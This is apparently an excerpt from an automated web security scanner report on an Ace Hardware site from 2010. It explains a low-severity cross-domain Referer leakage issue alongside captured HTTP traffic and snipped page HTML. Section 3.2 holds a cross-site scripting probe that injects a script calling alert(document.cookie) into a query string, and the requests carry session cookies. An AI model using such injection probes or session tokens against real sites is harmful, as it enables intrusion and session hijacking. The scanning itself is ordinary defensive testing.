Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; fsr.session={"v":1,"rid":"1293636636322_310950","pv":2,"to":3.9,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":2,"s":false,"e":1}},"cd":0,"sd":0,"f":1293639555524}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DHome%2520Page%7C1293641356673%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1293639560310

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:20:08 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/x-json
Content-Length: 33

{ "RESULTS" : []
,
"COUNT" : 29}

3. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.acehardware.com/home/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/product/index.jsp?productId=3388719
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; __g_c=w%3A1%7Cb%3A2%7Cr%3Ahttp%24*%24//www.acehardware.com/product/index.jsp%3FproductId%3D3388719_1___1293636694705%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_pers=%20s_lastvisit%3D1293636628457%7C1388244628457%3B%20s_nr%3D1293636701994%7C1296228701994%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293638502001%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":2,"to":3.9,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":2,"s":false,"e":1}},"cd":0,"sd":0,"f":1293636697249}; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:20:02 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>

<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />
<style type="text/css">
...[SNIP]...
shops online, hardware store online, hardware stores online, hardware retailer, home improvement, home improvements, home improvement store, home improvement stores, home improvement retailers" />


   <link rel="shortcut icon" href="http://ACE.imageg.net/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/WIZ_ACE_topNav.css" />


   <SCRIPT LANGUAGE="JavaScript">
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />-->
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<noscript><img class="dN" src="http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?" width="1" height="1" alt="" border="0" /></noscript>
<!-- End of DoubleClick Spotlight Tag: Please do not remove-->
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</a><img border="0" name="cms_image84597685" src="http://ACE.imageg.net/cms_widgets/38/06/380661_assets/static_113016.png" height="261" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" /></div>
...[SNIP]...
<div id="ace_home_2" style="width:572px;border:0px;overflow:hidden;">
<img border="0" name="Homepage_Brand_Bar_063010" src="http://ACE.imageg.net/cms_widgets/28/69/286926_assets/homepagebb.jpg" height="53" width="572" align="Default" valign="Default" usemap="#HomepageBrandBarMap" /><map name="HomepageBrandBarMap">
...[SNIP]...
</div>

               
                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Home:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/home_tabs_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_toprated_off.gif" width="84" height="23" alt="Top Rated" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
f='/product/index.jsp?productId=1963686&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Dimplex &reg; Compact Electric Stove with Remote (CS4416)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-1898323th.jpg"></a>
...[SNIP]...
product/index.jsp?productId=3266712&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:MTD. Gold Two Stage Electric Start Snow Thrower (31AM63LF704)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5197541th.jpg"></a>
...[SNIP]...
location.href='/product/index.jsp?productId=3994134&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Garant. 24in Poly Sleigh Snow Shovel (EPSS24)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-7230281th.jpg"></a>
...[SNIP]...
roductId=4356432&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Milwaukee&reg; M12 3/8in Drill- Driver & 1/4in Impact Driver Combo Kit (2494-22)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8331269th.jpg"></a>
...[SNIP]...
ow.location.href='/product/index.jsp?productId=2422176&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:MTD Products. Yard Machine. Snow Thrower (31AM62EE700)');" ><img src="http://ACE.imageg.net/graphics/product_images/p3069701th.gif"></a>
...[SNIP]...
005" onClick="window.location.href='/product/index.jsp?productId=4326005&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Propane Patio Heater');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8230761th.jpg"></a>
...[SNIP]...
ndow.location.href='/product/index.jsp?productId=4480136&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Toro. 18in Electric Power Curve Snow Thrower (38381)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8715075th.jpg"></a>
...[SNIP]...
on.href='/product/index.jsp?productId=4480287&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Yard Machines. 22in 179 CC Two Stage Snow Thrower (31A-62BD700)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8715077th.jpg"></a>
...[SNIP]...
window.location.href='/product/index.jsp?productId=10919739&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Dyno&reg; Swivel Straight Christmas Tree Stand (XTS3)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9003611th.jpg"></a>
...[SNIP]...
w.location.href='/product/index.jsp?productId=10918214&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Celebrations&reg; 4Ft Clear Lighted Porch Trees - Set of 2');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996113th.jpg"></a>
...[SNIP]...
ick="window.location.href='/product/index.jsp?productId=10918043&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Bissell&reg; Perfect Sweep Turbo Sweeper (28801)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996081th.jpg"></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=10881651&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Liberty Hardware&reg; Mailbox Post Kit in Black (TFSSMPK-BL-R)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8958982th.jpg"></a>
...[SNIP]...
ef='/product/index.jsp?productId=11101373&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:Yard World&reg; Spider Sprinkler Stand with X-Cell Wobbler Head (16375)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9313983th.jpg"></a>
...[SNIP]...
901" onClick="window.location.href='/product/index.jsp?productId=11100901&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:Fushigi Ball&reg; Gravity Ball (FUSHI6)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9313982th.jpg"></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=11097766&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:Oak Brook. 3-Function Hand Held Showerhead in Various Finishes');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8465113_white_th.jpg"></a>
...[SNIP]...
nClick="window.location.href='/product/index.jsp?productId=11085830&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:C.H. Hanson&reg; Magnetic Stud Finder (03040)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288654th.jpg"></a>
...[SNIP]...
<!-- end tabs -->

   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/home_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
</a><img border="0" name="Mobile_lower_widget_2" src="http://ACE.imageg.net/cms_widgets/24/54/245419_assets/111396_AceMobile_572x53_2.jpg" height="53" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="Ship to Store Logo 100108 2" src="http://ACE.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="Rebate 11-24-08" src="http://ACE.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<div id="homePandS" class="h250 mB10">
                   <img src="http://ACE.imageg.net/images/home_projectsandsolutionsSmall.jpg" alt="" width="199" height="238" border="0" usemap="#home_projectsandsolutions" />
                   <map name="home_projectsandsolutions">
...[SNIP]...
<div id="ace_home_5" style="width:199px;border:0px;overflow:hidden;">
<img border="0" name="social_media_199x53" src="http://ACE.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg" height="53" width="199" align="Default" valign="Default" usemap="#social_map" /><map name="social_map"><area shape="rect" coords="0,0,67,53" title="Facebook" href="http://facebook.com/acehardware"/><area shape="rect" coords="67,0,122,53" title="Twitter" href="http://twitter.com/acehardware"/><area shape="rect" coords="122,0,199,53" title="YouTube" href="http://youtube.com/acehardware"/></map>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<td valign=top><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145" width="1" height="1" border="0"></td>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.acehardware.com/product/index.jsp?productId=3388719;ord=1;num=73920939?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!-- end sitebg -->

   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   <!-- START SCANALERT CODE -->
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

3.2. http://www.acehardware.com/product/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product/index.jsp?productId=4356432&clickFrom=Home%3AFeatured+Products HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?525bf--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac030e2206a=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DUndefined%2520Page%253A%2520http%253A//www.acehardware.com/paintingtips/index.jsp%7C1293641650633%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":5,"to":5,"c":"http://www.acehardware.com/paintingtips/index.jsp","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0,"f":1293639577528}; fsr.a=1293639877133; __g_c=w%3A1%7Cb%3A6%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3F525bf--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eac030e2206a%3D1_2___1293639906310%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:25:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e524357145a415c52134c4a56555c570f1d0545551c4f1c00; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
Set-Cookie: rvp=4356432:3388719:; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" />


   <link rel="shortcut icon" href="http://ACE.imageg.net/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/WIZ_ACE_topNav.css" />

   <link rel="canonical" href="http://www.acehardware.com/product/index.jsp?productId=4356432" />
...[SNIP]...
ttributes VALUE = "shop: Ace Tree|category: Tools|category: Power Tools|family: Multi-Tool Kits|Name: Milwaukee&reg; M12 3/8in Drill- Driver & 1/4in Impact Driver Combo Kit (2494-22)|Price: 169.99">

   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_product.css" />
   

<script language="Javascript">
...[SNIP]...
</SCRIPT>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_LightBox.js"></script>
   <link href="http://ACE.imageg.net/css/WIZ_ACE_LightBox.css" rel="stylesheet" type="text/css" />
   
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
   <link href="http://ACE.imageg.net/css/WIZ_ACE_box.css" rel="stylesheet" type="text/css" />
   
   <script type="text/javascript" src="../js/WIZ_ToolTip.js"></script>
   <link href="http://ACE.imageg.net/css/WIZ_ACE_ToolTip.css" rel="stylesheet" type="text/css" />
   

   <script type="text/javascript">
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
<!--You are running on ashprd2_ws_49_2-->


<script type="text/javascript" src="http://ACE.imageg.net/include/expressShop.js"></script>
...[SNIP]...
<a href="javascript:showEnhanced();">
                   <img id="mainProdImage" SRC="http://ACE.imageg.net/graphics/product_images/pACE3-8331269reg.jpg" WIDTH="220" HEIGHT="220" alt=' Milwaukee&reg; M12 3/8in Drill- Driver & 1/4in Impact Driver Combo Kit (2494-22) - Ace Hardware' title=' Milwaukee&reg; M12 3/8in Drill- Driver & 1/4in Impact Driver Combo Kit (2494-22) - Ace Hardware' border="0" /></a>
...[SNIP]...
<a href="javascript:showEnhanced();" class="aNoUnderline"><img src="http://ACE.imageg.net/images/magGlassIcon.gif" alt="" border="0" /></a>
...[SNIP]...
</div>    

       
                           <script src=http://content.webcollage.net/acehardware/smart-button></script>
...[SNIP]...
<div class="prodBgC3 prodBorder3b">

                                   <img class="dB fL pR t1- l1-" src="http://ACE.imageg.net/images/bucket_tl_hdr.gif" width="12" height="11" alt="" border="0" />
                                   <img class="dB pR l6-" src="http://ACE.imageg.net/images/prod_title_relatedcategories.gif" width="134" height="25" alt="Related Categories" border="0" />
                               </div>
...[SNIP]...
</div>
                               <img class="dB pR t1 l250" src="http://ACE.imageg.net/images/bucket_br_white.gif" width="12" height="10" alt="" border="0" />

                           </div>
...[SNIP]...
<div class="prodBgC3 prodBorder3b">
                           <img class="dB fR pR t1- l1" src="http://ACE.imageg.net/images/bucket_tr_hdr.gif" width="12" height="11" alt="" border="0" />
                           <img class="dB" src="http://ACE.imageg.net/images/prod_title_relateditems.gif" width="98" height="24" alt="Related Items" border="0" />
                       </div>
...[SNIP]...
<a href="/product/index.jsp?productId=10868147" onclick="window.location.href='/product/index.jsp?productId=10868147&clickid=prod_cs';return false;"><img class="dB" src="http://ACE.imageg.net/graphics/product_images/pACE3-8943875th.jpg" width="80" height="80" alt=' Makita&reg; Compact Lithium-Ion 3 Piece Combo Kit (LCT300W) - Ace Hardware' title=' Makita&reg; Compact Lithium-Ion 3 Piece Combo Kit (LCT300W) - Ace Hardware' border="0" /></a>
...[SNIP]...
<a href="/family/index.jsp?categoryId=1259412" class="aNoUnderline"><img src="http://ACE.imageg.net/images/linkArrow.gif" border="0" align="absbottom"></a>
...[SNIP]...
<a id="href_id_1" href="javascript:void(0);">
<img id="additemtocart_1" name="additemtocart_1" class="dB" src="http://ACE.imageg.net/images/prod_btn_additemtocart_off.gif" width="134" height="23" alt="Add Item to Cart" border="0" /></a>
...[SNIP]...
<a href="/product/index.jsp?productId=10841803" onclick="window.location.href='/product/index.jsp?productId=10841803&clickid=prod_cs';return false;"><img class="dB" src="http://ACE.imageg.net/graphics/product_images/pACE3-8909595th.jpg" width="80" height="80" alt=' Dewalt&reg; XRP 18V Hammerdrill/Reciprocating Saw Combo Kit (DCK241X) - Ace Hardware' title=' Dewalt&reg; XRP 18V Hammerdrill/Reciprocating Saw Combo Kit (DCK241X) - Ace Hardware' border="0" /></a>
...[SNIP]...
<a href="/family/index.jsp?categoryId=1259412" class="aNoUnderline"><img src="http://ACE.imageg.net/images/linkArrow.gif" border="0" align="absbottom"></a>
...[SNIP]...
<a id="href_id_2" href="javascript:void(0);">
<img id="additemtocart_2" name="additemtocart_2" class="dB" src="http://ACE.imageg.net/images/prod_btn_additemtocart_off.gif" width="134" height="23" alt="Add Item to Cart" border="0" /></a>
...[SNIP]...
<a href="/product/index.jsp?productId=2284374" onclick="window.location.href='/product/index.jsp?productId=2284374&clickid=prod_cs';return false;"><img class="dB" src="http://ACE.imageg.net/graphics/product_images/p2834651th.gif" width="80" height="80" alt=' Black & Decker&reg; Workmate&reg; X-Frame Light Duty Workbench (WM125) - Ace Hardware' title=' Black & Decker&reg; Workmate&reg; X-Frame Light Duty Workbench (WM125) - Ace Hardware' border="0" /></a>
...[SNIP]...
<div class="prodC2">
           Reward Pts:<img src="http://ACE.imageg.net/images/pixel.gif" width="3px" height="2px" border="0"><span class="fB">
...[SNIP]...
<a href="/family/index.jsp?categoryId=1259459" class="aNoUnderline"><img src="http://ACE.imageg.net/images/linkArrow.gif" border="0" align="absbottom"></a>
...[SNIP]...
<a id="href_id_3" href="javascript:void(0);">
<img id="additemtocart_3" name="additemtocart_3" class="dB" src="http://ACE.imageg.net/images/prod_btn_additemtocart_off.gif" width="134" height="23" alt="Add Item to Cart" border="0" /></a>
...[SNIP]...
</div>


                            <img class="dB pR t1 l11-" src="http://ACE.imageg.net/images/prod_bl_ext_relateditems.gif" width="12" height="11" alt="" border="0" />    
                               

       </div>
...[SNIP]...
</div>
       

           <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_box.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_ToolTip.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_ToolTip.css" rel="stylesheet" type="text/css" />

   
   <form name="frm" id="rvform">
...[SNIP]...
